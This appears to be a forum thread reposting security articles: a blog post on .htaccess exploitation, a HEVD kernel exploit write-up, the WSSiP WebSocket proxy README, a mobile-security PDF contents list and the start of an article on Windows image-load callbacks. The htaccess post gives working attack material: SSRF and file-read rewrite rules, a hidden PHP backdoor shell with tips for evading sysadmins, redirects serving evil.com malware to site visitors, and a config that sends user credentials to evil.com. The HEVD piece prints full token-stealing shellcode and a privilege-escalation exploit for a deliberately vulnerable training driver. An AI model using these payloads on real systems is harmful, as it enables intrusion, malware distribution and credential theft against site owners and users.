Generally, most secure websites will have filters in place to prevent SSRF from taking place. There are many bypass methods for SSRF, but I’m going to be focusing specifically on a context where it only allows the input to be a remote resource or a valid (or seemingly valid) URL. So assuming an attacker will be blacklisted if they attempt redirection to localhost/127.0.0.1/0.0.0.0 or file:// uri scheme, then they could setup a mod_rewrite with htaccess like so:
Options +FollowSymlinks
RewriteEngine on
RewriteRule lol.jpg http://127.0.0.1:3306 [NC]or to read local files:
Options +FollowSymlinks
RewriteEngine on
RewriteRule lol.jpg file:/etc/passwd [NC]Of course, this technique can also be used to achieve RCE assuming there is a vulnerable service such as sftp, gopher, memcached or something similar on the target server.
This will potentially bypass any blacklist in place as you could add http://example.com/lol.jpg as the input for the vulnerable script, then the vulnerable script could instead make a request to http://127.0.0.1:3306 or file:/etc/passwd after making the original request to http://example.com/lol.jpg — causing the SSRF to be exploited and the filter to be bypassed (in this example disclosing MySQL version or passwd output)
There are many cases where this won’t work, but I’ve used this for bounties on various programs in the past with success.
Arbitrary File Upload:
In addition to having uses within SSRF, .htaccess can also be abused for arbitrary file upload in some cases. If there was a scenario where a vulnerable website had a file upload form with a blacklist-based filter in place (blocking specific extensions such as .php or .phtml), then in some cases it could be possible to upload a .htaccess file, resulting in a varying degree of consequences.
htaccess has a default deny rule which prevents it from being accessible over the internet. If an attacker has the ability to override htaccess, the first thing they will need to do is disable the deny rule so that it can be accessible by navigating to the relevant URL path, to do this, an attacker would upload a htaccess file that looks something similar to this:
<Files ~ “^\.ht”>
# overriding deny rule
# making htaccess accessible from the internet
Require all granted
Order allow,deny
Allow from all
</Files>This now means that an attacker can freely view htaccess by simply navigating to the URL (http://site.com/.htaccess).
If an attacker has the ability to override the current .htaccess file in use, and replace it with their own, then this would allow them to perform all kinds of attacks on the server, ranging from application-level DoS to full-blown Remote Command Execution. Whether this works is dependant on which apache modules are enabled. If modules such as mod_info and mod_status are enabled then an attacker can perform information disclosure and Remote Command Execution respectively.
Once an attacker has overridden the sites original htaccess file and disabled the default deny rule, they could perform Remote Command Execution by adding the following line to their custom htaccess file:
AddType application/x-httpd-php .htaccess
This will make the server treat htaccess files as PHP scripts, and, paired with the method above to override the vulnerable servers original htaccess file, an attacker could then navigate to the URL where the htaccess file is stored on the server in order to execute their PHP code. The payload that the attacker crafts would be in the form of a comment within the htaccess file, for example:
AddType application/x-httpd-php .htaccess
# <?php echo “get pwned”; ?>Of course, this isn’t limited to PHP. You could use the same method to spawn a JSP shell or something similar (all depending on which technologies are running on the server) — in order to do this they would need to change the value for AddType to correspond to the code that they wish to execute.
If, for some reason, it isn’t allowing htaccess to be accessed despite the deny rule being disabled (e.g. as a result of an external config for the HTTP daemon or a CMS-specific config file), then an attacker could instead use AddType to set a more ‘innocent’ file such as a JPG to be treated as a PHP file. They could then include some malicious PHP code within their JPG image, upload the image, and navigate to the path where the image is stored in order for their code to execute.
If the attacker is exploiting an outdated system with Windows 8.3 (SFN) filename conventions, then it may be possible to circumvent a blacklist-based filter that is stopping files named ‘htaccess’ from being uploaded. The shortname for .htaccess can be used in cases like this. An attaker could upload a file named ‘HTACCE~1’ and if 8.3 filename conventions are in use, then this will be the equivalent to uploading a file named ‘.htaccess’ — assuming such filename conventions are in use (not too common these days), this could be used to bypass signature-based filters and blacklists that are in place for file upload functionality.
Watering hole attacks and mass infecting site users with malware:
If an attacker manages to compromise a website and has limited (non-root) access yet still has the ability to make modifications to htaccess, then this can be used for a variety of exploitation cases. The first example of this that I will cover is how an attacker can modify htaccess to act as a practical watering hole attack.
If an attacker has a specific user in mind that they want to target, and they know the IP address of the user, alongside websites that the user frequents, then watering hole attacks are a possibility if the attacker has the ability to edit or override the htaccess file of a site that their victim frequently visits (through having partial access or the ability to override the sites current htaccess file through means of arbitrary file upload). Let’s assume the attacker has a target in mind, and knows that their IP address is 151.121.2.69and that they frequently visit a website called example.com — If the attacker found a method to overwrite the htaccess file for example.com, then they could setup a htaccess rule like so:
RewriteCond %{REMOTE_ADDR} ^151\.\121\.2\.69$
RewriteCond %{REQUEST_URI} !/GetHacked.php
RewriteRule .*\.(htm|html|php)$ /GetHacked.php [R,L]With the example above, any regular user visiting example.com would be able to browse the website as normal. If the victim were to visit example.com, they would be redirected to GetHacked.php (it would be more stealthy than this of course, but that’s just an example). Generally the page that the victim would be redirected to would look identical to the site that they were intending to connect to in terms of design (and would have the same domain name), but they would be redirected to a separate, unique page on the site which would then serve malware, hook their browser, or exploit their browser via a zero-day vulnerability. If done properly, the victim would be completely unaware of the fact that anything out of the ordinary had taken place. They would continue to browse the site as usual, having no idea that they had fallen victim to a watering hole attack. If planned out properly, this can lead to a highly sophisticated, stealthy, targeted attack against someone while they remain completely oblivious to what happened.
Although the method I just described is a targeted watering hole attack aimed at a specific victim, it is also possible to use htaccess to serve malware to the userbase of a website in general through a series of rewrite rules. This is generally achieved by checking the referer header to see which site the user is coming from, and redirecting them to malware based upon that. Usually an attacker wanting to spread malware would gain access to a popular website and then create some rewrite rules for htaccess that would cause anyone visiting the site from a popular search engine to be redirected to malware or a browser exploit. This could be achieved like so:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*duckduckgo.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.*
RewriteRule ^(.*)$ http://evil.com/malware.ext [R=301,L]In addition to malicious hackers compromising websites and modifying the vulnerable sites’ htaccess file in order to spread malware or build a botnet, another common application of this technique is to push traffic to sites that pay for traffic. If a hacker was to compromise some popular websites and modify their htaccess files to setup redirect rules, they could make it so that any visitors to the site arriving from a search engine are instead redirected to a site of the hackers choice. This is a popular way of making money within the blackhat community, as many websites will pay for traffic pushed to their domain, and by hacking high Alexa or Google PR ranked websites and modifying their htaccess file in that manner, it can be highly profitable due to the sheer amount of traffic generated.
Another thing to take note of is that this can also be used as a defence mechanism through use of htaccess rules on your own website. For example, imagine the hypothetical situation that you operate a website and you are aware that users of an online hacking forum are trying to target your site, you could setup htaccess rules so anyone coming directly from the malicious site to your site is redirected to malware, and pre-emptively counter-hacked before they have the opportunity to cause any damage. If you are aware that people from evil-site.com are trying to target your website, then you could setup a htaccess rule like so:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*evil-site.com
RewriteRule ^(.*)$ http://hack-the-hackers.com/malware.ext [R=301,L]As well as the methods described above to infect site users with malware, a similar thing can be achieved though use of error documents. You can add htaccess rules so that when common HTTP status code errors are triggered, the user is redirected to malware:
ErrorDocument 403 http://evil.com/payload.php
ErrorDocument 404 http://evil.com/payload.php
ErrorDocument 500 http://evil.com/payload.phpInformation Disclosure through htaccess:
There are two primary forms of information disclosure through htaccess files. One requires access to the compromised server, the other does not.
Occasionally htaccess files can be readable by anyone due to a server misconfiguration or the lack of a default deny rule. When performing a penetration test, It’s always useful to check whether htaccess is readable (9 times out of 10, it won’t be) so you can see which rewrite rules and other restrictions or settings are in place. You’ll be surprised at what information can be disclosed, and you’ll be surprised at how often you’ll manage to come across sites that fail to properly configure their server or HTTP 403 their htaccess file. For context:
It’s always worth checking whether you can read .htaccess on a site that you’re performing an audit on. To do this, simply navigate to the following URL on the site that you’re testing:
http://example.com/.htaccess
Generally you will receive a HTTP 403 response, but in some cases you will have the ability to read .htaccess — It’s also worth pointing out that the file may not always be named .htaccess, there are a few common variations to look out for:
- OLD.htaccess
- 1.htaccess
- dot.htaccess
- backup.htaccess
- _.htaccess
- -.htaccess
In addition to this, htaccess will be a text file within certain CMS’ (some examples being Joomla and OpenCart) — so depending on which CMS the server is running, it’s sometimes worth checking for htaccess.txt to see if that is readable. Here is an example (on a Joomla install):
http://www.nationalcrimeagency.gov.uk/htaccess.txt
The second (and far more effective) version of information disclosure through .htaccess is in a context where an attacker has limited access to a server. Let’s assume that they can’t edit files or perform other actions, but they have the ability to edit .htaccess (or replace htaccess through means of arbitrary file upload). In addition to bypassing restrictions such as PHP safe mode and spawning a shell (which I will cover in the next section), it can also be used to disclose information on the server in order to further aid an attack. Assuming syscalls are disabled and the methods for abusing htaccess to modify php.ini (to enable syscalls) isn’t working, then information disclosure is probably the next course of action for an attacker.
Assuming you can execute PHP code through a malicious htaccess file, there are the obvious means of information disclosure that can be used through PHP’s functionality (although a LOT more than information disclosure can be done if you have the abiliy to execute syscalls rather than just run PHP code). Assuming you don’t have the ability to execute syscalls, but can still execute PHP, then the most obvious form of information disclosure would be through the use of the phpinfo(); function. You would first override the deny rule as explained earlier, then you would navigate to the URL where htaccess is located in order to display phpinfo (giving you the PHP version, kernel version, and other useful information):
AddType application/x-httpd-php .htaccess
# <?php phpinfo(); ?>Another possibility (although this is very easily detected by the sysadmin) is that you can change the content-type for server-sided scripts, allowing an attacker to read the source code for PHP files. This means they would then have the ability to perform a whitebox source code audit on the site, enabling them to potentially find more vulnerabilities:
<FilesMatch “\.ph.*$”>
SetHandler text/plain
AddType text/plain .php
</FilesMatch>If an attackers goal is to be stealthy, then this probably isn’t the best option. This could be achieved in a more stealthy manner by setting AddType text/plain filename.php to the name of a specific file that they wish to view the source code for (before reverting it back to its original content-type). Doing this one file at a time would drastically reduce the chances of a sysadmin detecting that something was up (It’s going to be pretty obvious to them that something is wrong if EVERY page on their website is leaking its source code for anyone to see). Assuming an attacker has limited access and lacks read permissions for PHP files, then this can be highly valuable as it will allow them to find more critical vulnerabilities that would allow them to escalate privileges and gain a higher level of access.
It is also possible to disclose server-status and server-info by appending the following lines to your malicious htaccess file through use of the SetHandler directive:
SetHandler server-status
SetHandler server-infoThis will leak useful information about the server, alongside the IP addresses of all users connecting to the server (allowing an attacker to gather intel on the userbase of their target website). Depending on the technologies running on the target website, SetHandler can also be used to disclose other kinds of information (for example information pertaining to the LDAP configuration or things like caucho-status — this won’t be too common since java servlets are practically always handled via Tomcat within Apache now rather than Resin, but there are equivalents for Tomcat and other technologies).
The method described for performing browser fingerprinting and IP logging users can also be utilized for information disclosure (this doesn’t require any form of access or vulnerability to the target server). A PHP dynamic image can be used in conjunction with a htaccess file hosted on your own server, and then an attacker can input the URL to the image somewhere on the target server, causing the target server to request the image and the backend IP address of the target server to be written to the logfile on the attackers server. This can be used to bypass services like Cloudflare in order to reveal the real IP address of a server.
Harvesting login credentials by phishing:
There are a few different ways that an attacker can use htaccess in order to harvest login credentials and spear phish users. The methods I will discuss here are spear phishing through use of ErrorDocument — In addition to being able to serve malware through the use of custom error documents, you can also create documents using HTML/CSS/JS, meaning that somene can easily create an iframe phisher to harvest credentials, It’s just as simple as:
ErrorDocument 403 <YourHtmlCode>
when the user reaches a 403 page (or whatever HTTP status code the attacker chooses to set), they can create a phony login page through use of an iframe or document.write(); in order to trick users into handing over their credentials.
Another method of phishing via making modifications to htaccess on a compromised site is by prompting the user with a username/password box and then sending the inputted credentials to a remote server controlled by the attacker, here is a htaccess file created by wireghoul in order to achieve this:
# This file will prompt the user for username and password
# And send the credentials to your server in plaintext (http basic auth)
# You will need to edit this file and create a script to collect the
# credentials on your server
AuthType Basic
AuthName “”
AuthRemoteServer evil.com
AuthRemotePort 80
AuthRemoteURL /phish/
require valid-user
# Your script need to return the corresponding 401 or 200 ok response codes
# to the mod_auth_remote module.In part #2 of this blog series, I will be explaining some unique and complex phishing methods that utilize htaccess which are virtually undetectable.
Using htaccess to spawn a shell:
If an attacker has limited access to the server they are trying to target, or a vulnerability that allows them to override the currently existing htaccess file, then it is possible to turn htaccess into a web-based HTTP GET shell using the methods described earlier in this post. Even if the attacker already has shell access to the server, it may be useful for them to add an additional shell to htaccess in order to maintain access in the instance that their original shell is detected and removed.
Here is an example of what a fully functional htaccess shell would look like:
# htaccess backdoor shell
# this is relatively stealthy compared to a typical webshell# overriding deny rule
# making htaccess accessible from the internet
# without this you’ll get a HTTP 403
<Files ~ “^\.ht”>
Require all granted
Order allow,deny
Allow from all
</Files># Make the server treat .htaccess file as .php file
AddType application/x-httpd-php .htaccess# <?php system($_GET[‘hax’]); ?>
# To execute commands you would navigate to:
# http://vulnerable.com/.htaccess?hax=YourCommand# If system(); isnt working then try other syscalls
# e.g. passthru(); shell_exec(); etc
# If you still cant execute syscalls, try bypassing php.ini via htaccessGenerally if an attacker was using htaccess as a means of maintaining shell access to a compromised site, they would add some form of padding/whitespace or additional (harmless) directives to the htaccess file, making it longer in length so that the sysadmin is less likely to notice any suspicious looking PHP code within their htaccess file. For htaccess shells that rely more heavily on stealth, I’d suggest incorporating non-alphanumericism into your PHP code (I’ll be talking more about non-alphanumericism within an upcoming blog post regarding methods of maintaining access to a compromised server).
Also, for a comprehensive list of various forms of shells that can be used within htaccess in instances where PHP isn’t available, I would strongly recommend looking into wireghoul’s ‘htshells’ repository.
Final Notes (and what’s coming next):
In part #2 of this series, I will be explaining how to use htaccess to “counter-hack” anyone who tries to target your site, I will be covering use of auto_append_file to make every page on a website serve malware, I will also be explaining various methods of symlink bypasses using htaccess (some of which would allow an attacker to compromise thousands of sites at once on a shared host) that currently work for a variety of environments, alongside methods of bypassing HTTP 403 through use of htaccess.
In addition to this, I will be discussing how to bypass PHP’s safe mode with htaccess and how to make modifications to php.ini in order to be able to spawn a shell more effectively and how an attacker could have a higher level of control over a target server through use of htaccess exploitation (through the ability to modify php.ini to their choosing). I will also be touching lightly upon some of the more advanced phishing techniques that can be achieved by abusing htaccess.
Contact: PROJECT INSECURITY
That’s all for now. I’m open to constructive criticism but this is my first blog post so don’t be too mean about my terrible writing style or any errors I made. The quality of my writing will improve in future posts. I hope someone at least learned something from this — MLT
Sursa: https://medium.com/@insecurity_92477/utilizing-htaccess-for-exploitation-purposes-part-1-5733dd7fc8eb
-
Contents Understanding the Risk.............................................................................................................. 3 Communication.......................................................................................................................... 5 Transport Layer Security (TLS) .............................................................................................. 5 Certificate Pinning .................................................................................................................. 6 Data Storage.............................................................................................................................. 9 Binary Protections.....................................................................................................................14 Obfuscation ...........................................................................................................................15 Root/Jailbreak Detection .......................................................................................................15 Debug Protection...................................................................................................................17 Hook Detection......................................................................................................................18 Runtime Integrity Checks.......................................................................................................20 Attacker Effort ...........................................................................................................................21 Grading Applications.................................................................................................................22
Download: http://file.digitalinterruption.com/Secure Mobile Development.pdf
-
2
-
-
HEVD Stack Overflow GS
Posted on September 5, 2017
Lately, I've decided to play around with HackSys Extreme Vulnerable Driver (HEVD) for fun. It's a great way to familiarize yourself with Windows exploitation. In this blog post, I'll show how to exploit the stack overflow that is protected with /GS stack cookies on Windows 7 SP1 32 bit. You can find the source code here. It has a few more exploits written and a Win10 pre-anniversary version of the regular stack buffer overflow vulnerability.
Triggering the Vulnerable Function
To start, we need to find the ioctl dispatch routine in HEVD. Looking for theIRP_MJ_DEVICE_CONTROL IRP, we see that the dispatch function can be found at hevd+508e.
kd> !drvobj hevd 2 Driver object (852b77f0) is for: \Driver\HEVD DriverEntry: 995cb129 HEVD DriverStartIo: 00000000 DriverUnload: 995ca016 HEVD AddDevice: 00000000 Dispatch routines: [00] IRP_MJ_CREATE 995c9ff2 HEVD+0x4ff2 [01] IRP_MJ_CREATE_NAMED_PIPE 995ca064 HEVD+0x5064 ... [0e] IRP_MJ_DEVICE_CONTROL 995ca08e HEVD+0x508e [0f] IRP_MJ_INTERNAL_DEVICE_CONTROL 995ca064 HEVD+0x5064 [10] IRP_MJ_SHUTDOWN 995ca064 HEVD+0x5064 [11] IRP_MJ_LOCK_CONTROL 995ca064 HEVD+0x5064 [12] IRP_MJ_CLEANUP 995ca064 HEVD+0x5064 [13] IRP_MJ_CREATE_MAILSLOT 995ca064 HEVD+0x5064 [14] IRP_MJ_QUERY_SECURITY 995ca064 HEVD+0x5064 [15] IRP_MJ_SET_SECURITY 995ca064 HEVD+0x5064 ...
Finding the ioctl request number requires very light reverse engineering. We want to end up eventually at hevd+515a. At hevd+50b4, the request number is subtracted by 222003h. If it was 222003h, then jump to hevd+5172, or else fall through to hevd+50bf. In this basic block, our ioctl request number is subtracted by 4. If the result is 0, we are where we want to be. Therefore, our ioctl number should be 222007h.
Eventually, a memcpy is reached where the calling function does not check the copy size.
To give the overflow code a quick run, we call it with benign input using the code below. You can find the implementation of mmap and write in the full source code.
def trigger_stackoverflow_gs(addr, size): dwReturn = c_ulong() driver_handle = kernel32.CreateFileW(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) if not driver_handle or driver_handle == -1: sys.exit() print "[+] IOCTL: 0x222007" dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222007, addr, size, None, 0, byref(dwReturn), None) m = mmap() write(m, 'A'*10) trigger_stackoverflow_gs(m, 10)
In WinDbg, the debug output confirms that we are calling the right ioctl.
From the figure, we can see that the kernel buffer is 0x200 in size so if we run a PoC again, but with 0x250 As, we should overflow the stack cookie and blue screens our VM.
Indeed, the bugcheck tells us that the system crashed due to a stack buffer overflow. Stack cookies in Windows are first XORed with ebp before they're stored on the stack. If we take the cookie in the bugcheck, and XOR it with 41414141, the result should resemble a stack address. Specifically, it should be the stack base pointer for hevd+48da.
kd> ? e9d25b91 ^ 41414141 Evaluate expression: -1466754352 = a8931ad0
Bypassing Stack Cookies
A common way to bypass stack cookies, introduced by David Litchfield, is to cause the program to throw an exception before the stack cookie is checked at the end of the function. This works because when an exception occurs, the stack cookie is not checked.
There are two ways [generating an exception] might happen--one we can control and the other is dependent of the code of the vulnerable function. In the latter case, if we overflow other data, for example parameters that were pushed onto the stack to the vulnerable function and these are referenced before the cookie check is performed then we could cause an exception here by setting this data to something that will cause an exception. If the code of the vulnerable function has been written in such a way that no opportunity exists to do this, then we have to attempt to generate our own exception. We can do this by attempting to write beyond the end of the stack.
For us, it's easy because the vulnerable function uses memcpy. We can simply force memcpy to segfault by letting it continue copying the source buffer all the way to unmapped memory.
I use my mmap function to map two adjacent pages, then munmap to unmap the second page. mmap and munmap are just simple wrappers I wrote for NtAllocateVirtualMemoryand NtFreeVirtualMemory respectively. The idea is to place the source buffer at the end of the mapped page that was mapped, and have the vulnerable memcpy read off into the unmapped page to cause an exception.
To test this, we'll use the PoC code below.
m = mmap(size=0x2000) munmap(m+0x1000) trigger_stackoverflow_gs(m+0x1000-0x250, 0x251)
Back in the debugger, we can observe that an exception was thrown and eip was overwritten as a result of the exception handler being overwritten.
The next step is to find the offset of the As so we can control eip to point to shellcode. You can use a binary search type way to find the offset, but an easier method is to use a De Bruijn sequence as the payload. I usually use Metasploit's pattern_create.rb andpattern_offset.rb for finding the exact offset in my buffer.
The figure above shows us 41367241 overwrites the exception handler address and so also eip.
kd> .formats 41367241 Evaluate expression: Hex: 41367241 Decimal: 1094087233 Octal: 10115471101 Binary: 01000001 00110110 01110010 01000001 Chars: A6rA Time: Wed Sep 1 18:07:13 2004 Float: low 11.4029 high 0 Double: 5.40551e-315
Reversing the order due to endianness, we get Ar6A which pattern_offset.rb tells us is offset 528 (0x210). Therefore, our source buffer will be of size 0x210+4, where the 4 is due to the address of our shellcode.
Constructing Shellcode
Since there is 0x1000-0x210-4 unused space in our allocated page, we can just put our shellcode in the beginning of the page. I use common Windows token stealing shellcode that basically iterates through the _EPROCESSs, looks for the SYSTEM process, and copies the SYSTEM process' token. Additionally, for convenience in breaking at the shellcode, I prepend the shellcode with a breakpoint (\xcc).
\xcc\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00 \x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8 \x00\x00\x00\x89\x91\xf8\x00\x00\x00
Our shellcode still isn't complete yet; the shellcode doesn't know where to return to after it executes. To search for a return address, let's inspect the call stack in the debugger when the shellcode executes.
kd> k # ChildEBP RetAddr WARNING: Frame IP not in any known module. Following frames may be wrong. 00 a88cf114 82ab3622 0x1540000 01 a88cf138 82ab35f4 nt!ExecuteHandler2+0x26 02 a88cf15c 82ae73b5 nt!ExecuteHandler+0x24 03 a88cf1f0 82af005c nt!RtlDispatchException+0xb6 04 a88cf77c 82a79dd6 nt!KiDispatchException+0x17c 05 a88cf7e4 82a79d8a nt!CommonDispatchException+0x4a 06 a88cf868 995c9969 nt!KiExceptionExit+0x192 07 a88cf86c a88cf8b4 HEVD+0x4969 08 a88cf870 01540dec 0xa88cf8b4 09 a88cf8b4 41414141 0x1540dec 0a a88cf8b8 41414141 0x41414141 0b a88cf8bc 41414141 0x41414141 ... 51 a88cfad0 995c99ca 0x41414141 52 a88cfae0 995ca16d HEVD+0x49ca 53 a88cfafc 82a72593 HEVD+0x516d 54 a88cfb14 82c6699f nt!IofCallDriver+0x63
hevd+4969 is the instruction address after the memcpy, but we can't return here because the portion of stack the remaining code uses is corrupted. Fixing the stack to the correct values would be extremely annoying. Instead, returning to hevd+49ca which is the return address of the stack frame right below hevd+4969 makes more sense.
However, if you adjust the stack and return to hevd+49ca, you'll still get a crash. The problem is at hevd+5260 where edi+0x1c is dereferenced. edi at this point is 0 because registers are XORed with themselves before the exception handler assumes control and neither the program nor our shellcode touched edi.
In a normal execution, edi and other registers are restored in __SEH_epilog4. These values are of course restored from the stack. Taking a88cf86c from the stack trace before, we can dump and attempt to find the restore values. They're actually are quite easy to find here because hevd+5dcc is quite easy to spot. hevd+5dcc is the address of the debug print string which is restored into ebx.
kd> dds a88cf86c a88cf86c 995c9969 HEVD+0x4969 a88cf870 a88cf8b4 a88cf874 01540dec a88cf878 00000218 a88cf87c 995ca760 HEVD+0x5760 a88cf880 995ca31a HEVD+0x531a a88cf884 00000200 a88cf888 995ca338 HEVD+0x5338 a88cf88c a88cf8b4 a88cf890 995ca3a2 HEVD+0x53a2 a88cf894 00000218 a88cf898 995ca3be HEVD+0x53be a88cf89c 01540dec a88cf8a0 31d15d0b a88cf8a4 8c843f68 <-- edi a88cf8a8 8c843fd8 <-- esi a88cf8ac 995cadcc HEVD+0x5dcc <-- ebx a88cf8b0 455f5359 a88cf8b4 41414141 a88cf8b8 41414141
To obtain the offset of edi, just subtract esp from the current address of the restore value.
kd> ? a88cf8a4 - esp Evaluate expression: 1932 = 0000078c kd> dds a88cfad0 la a88cfad0 a88cfae0 a88cfad4 995c99ca HEVD+0x49ca a88cfad8 01540dec a88cfadc 00000218 a88cfae0 a88cfafc a88cfae4 995ca16d HEVD+0x516d a88cfae8 8c843f68 a88cfaec 8c843fd8 a88cfaf0 86c3c398 a88cfaf4 8586f5f0 kd> ? a88cfad0 - esp Evaluate expression: 2488 = 000009b8
Similarly, finding the offset to return to is found by obtaining the difference of a88cfad0and esp.
Lastly, our shellcode should pop ebp; ret 8; which results in
start: xor eax, eax; mov eax,dword ptr fs:[eax+0x124]; # nt!_KPCR.PcrbData.CurrentThread mov eax,dword ptr [eax+0x50]; # nt!_KTHREAD.ApcState.Process mov ecx,eax; # Store unprivileged _EPROCESS in ecx loop: mov eax,dword ptr [eax+0xb8]; # Next nt!_EPROCESS.ActiveProcessLinks.Flink sub eax, 0xb8; # Back to the beginning of _EPROCESS cmp dword ptr [eax+0xb4],0x04; # SYSTEM process? nt!_EPROCESS.UniqueProcessId jne loop; stealtoken: mov edx,dword ptr [eax+0xf8]; # Get SYSTEM nt!_EPROCESS.Token mov dword ptr [ecx+0xf8],edx; # Copy token restore: mov edi, [esp+0x78c]; # edi irq mov esi, [esp+0x790]; # esi mov ebx, [esp+0x794]; # move print string into ebx add esp, 0x9b8; pop ebp; ret 0x8;
Gaining NT Authority\SYSTEM
Putting everything together, the final exploit looks like this.
m = mmap(size=0x2000) munmap(m+0x1000) size = 0x210+4 sc = '\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x8b\xbc\x24\x8c\x07\x00\x00\x8b\xb4\x24\x90\x07\x00\x00\x8b\x9c\x24\x94\x07\x00\x00\x81\xc4\xb8\x09\x00\x00\x5d\xc2\x08\x00' write(m, sc + 'A'*(0x1000-4-len(sc)) + struct.pack("<I", m)) trigger_stackoverflow_gs(m+0x1000-size, size+1) print '\n[+] Privilege Escalated\n' os.system('cmd.exe')
And that should give us:
-
1
-
-
WSSiP: A WebSocket Manipulation Proxy
Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server.
Upstream proxy support also means you can forward HTTP/HTTPS traffic to an intercepting proxy of your choice (e.g. Burp Suite or Pappy Proxy) but view WebSocket traffic in WSSiP. More information can be found on the blog post.
There is an outward bridge via HTTP to write a fuzzer in any language you choose to debug and fuzz for security vulnerabilities. See Fuzzing for more details.
Written and maintained by Samantha Chalker (@thekettu). Icon for WSSiP release provided by @dragonfoxing.
Installation
From Packaged Application
See Releases.
From npm/yarn (for CLI commands)
Run the following in your command line:
npm:
# Install Electron globally npm i -g electron@1.7 # Install wssip global for "wssip" command npm i -g wssip # Launch! wssip
yarn: (Make sure the directory in yarn global bin is in your PATH)
yarn global add electron@1.7 yarn global add wssip wssip
You can also run npm install electron (or yarn add electron) inside the installed WSSiP directory if you do not want to install Electron globally, as the app packager requires Electron be added to developer dependencies.
From Source
Using a command line:
# Clone repository locally git clone https://github.com/nccgroup/wssip # Change to the directory cd wssip # If you are developing for WSSiP: # npm i # If not... (as to minimize disk space): npm i electron@1.7 npm i --production # Start application: npm start
Usage
- Open the WSSiP application.
- WSSiP will start listening automatically. This will default to localhost on port 8080.
- Optionally, use Tools > Use Upstream Proxy to use another intercepting proxy to view web traffic.
- Configure the browser to point to http://localhost:8080/ as the HTTP Proxy.
- Navigate to a page using WebSockets. A good example is the WS Echo Demonstration.
- ???
- Potato.
Fuzzing
WSSiP provides an HTTP bridge via the man-in-the-middle proxy for custom applications to help fuzz a connection. These are accessed over the proxy server.
A few of the simple CA certificate downloads are:
- http://mitm/ca.pem / http://mitm/ca.der (Download CA Certificate)
- http://mitm/ca_pri.pem / http://mitm/ca_pri.der (Download Private Key)
- http://mitm/ca_pub.pem / http://mitm/ca_pub.der (Download Public Key)
Get WebSocket Connection Info
Returns whether the WebSocket id is connected to a web server, and if so, return information.
-
URL
-
URL Params
id=[integer]
-
Success Response (Not Connected)
-
Code: 200
Content: {connected: false}
-
Code: 200
-
Success Response (Connected)
-
Code: 200
Content: {connected: true, url: 'ws://echo.websocket.org', bytesReceived: 0, extensions: {}, readyState: 3, protocol: '', protocolVersion: 13}
-
Code: 200
Send WebSocket Data
Send WebSocket data.
-
URL
-
URL Params
Required:
id=[integer]
sender one of client or server
mode one of message, ping or pong
type one of ascii or binary (text is an alias of ascii)
Optional:
log either true or y to log in the WSSiP application. Errors will be logged in the WSSiP application instead of being returned via the REST API.
-
Data Params
Raw data in the POST field will be sent to the WebSocket server.
-
Success Response:
-
Code: 200
Content: {success: true}
-
Code: 200
-
Error Response:
-
Code: 500
Content: {success: false, reason: 'Error message'}
-
Code: 500
Development
Pull requests are welcomed and encouraged. WSSiP supports the debug npm package, and setting the environment variable DEBUG=wssip:* will output debug information to console.
There are two commands depending on how you want to compile the Webpack bundle: for development, that is npm run compile:dev and for production is npm run compile. React will also log errors depending on whether development or production is specified.
Currently working on:
- Exposed API for external scripts for fuzzing (99% complete, it is live but need to test more data)
- Saving/Resuming Connections from File (35% complete, exporting works sans active connections)
- Using WSSiP in browser without Electron (likely 1.1.0)
- Rewrite in TypeScript (likely 1.2.0)
- Using something other than Appbar for Custom/Intercept tabs, and styling the options to center better
For information on using the mitmengine class, see: npm, yarn, or mitmengine/README.md
-
1
-
1
-
Windows’ PsSetLoadImageNotifyRoutine Callbacks: the Good, the Bad and the Unclear (Part 1)
tl;dr: Security vendors and kernel developers beware – a programming error in the Windows kernel could prevent you from identifying which modules have been loaded at runtime.
Introduction
During research into the Windows kernel, we came across an interesting issue with PsSetLoadImageNotifyRoutine which as its name implies, notifies of module loading.
The thing is, after registering a notification routine for loaded PE images with the kernel the callback may receive invalid image names.
After digging into the matter, what started as a seemingly random issue proved to originate from a coding error in the Windows kernel itself.
This flaw exists in the most recent Windows 10 release and past versions of the OS, dating back to Windows 2000.
The Good: Notification of Module Loading
Say you are a security vendor developing a driver, you would like to be aware of every module the system loads. Hooking? Maybe… but there are many security and implementation deficiencies.
Here’s where Microsoft introduced PsSetLoadImageNotifyRoutine, in Windows 2000. This mechanism, notifies registered drivers, from various parts in the kernel, when a PE image file has been loaded to virtual memory (kernel\user space).
Behind the Scenes:
There are several cases that will cause the notification routine to be invoked:
- Loading drivers
-
Starting new processes
- Process executable image
- System DLL: ntdll.dll (2 different binaries for WoW64 processes)
- Runtime loaded PE images – import table, LoadLibrary, LoadLibraryEx[1], NtMapViewOfSection[2]
When invoking the registered notification routines, the kernel provides them with a number of parameters in order to properly identify the PE image that is being loaded. These parameters can be seen in the prototype definition of the callback function:
VOID (*PLOAD_IMAGE_NOTIFY_ROUTINE)( _In_opt_ PUNICODE_STRING FullImageName, // The image name _In_ HANDLE ProcessId, // A handle to the process the PE has been loaded to _In_ PIMAGE_INFO ImageInfo // Information describing the loaded image (base address, size, kernel/user-mode image, etc) );
The Only Way to Go
In essence, this is the only documented method in the WDK to actually monitor PEs that are loaded to memory as executable code.
